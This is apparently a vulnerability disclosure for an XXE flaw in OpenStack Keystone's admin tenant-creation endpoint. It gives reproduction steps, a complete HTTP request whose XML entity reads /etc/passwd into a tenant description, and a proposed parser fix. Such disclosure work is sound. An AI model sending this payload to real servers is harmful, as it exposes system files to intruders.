XXE vulnerability in keystone

It's possible to gain access to arbitrary files on a keystone server by injecting XXE to the admin interface of a keystone server.

You need a valid admin token achieve this.

1. Authenticate to the Keystone service to gain a valid administrative token.
2. Submit the request below to the admin keystone endpoint.
3. Verify a tenant is created and the "description" field contains the contents of the /etc/passwd file on the keystone server.

POST
https://admin-auth-cloud.com:35358/v2.0/tenants
HTTP/1.1
Host: admin-auth-cloud.com:35358
Content-length: 253
Proxy-Connection: Keep-Alive
Accept: */*
X-Auth-Token: <VALID AUTH TOKEN>
User-Agent: python-keystoneclient
Content-Type: application/xml
Accept: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]>
<tenant xmlns="http://docs.openstack.org/identity/api/v2.0"
enabled="true" id="XxeTest2" name="Xxe Tenant 2">
<description>&foo;</description>
</tenant>

Possible solution:

keystone/common/serializer.py : 60 - 64
class XmlDeserializer(object):
def __call__(self, xml_str):
"""Returns a dictionary populated by decoding the given xml string."""
dom = etree.fromstring(xml_str.strip())
return self.walk_element(dom, True)

Replace:
dom = etree.fromstring(xml_str.strip())

With:
dom = etree.fromstring(xml_str.strip(),
parser=etree.XMLParser(resolve_entities=False))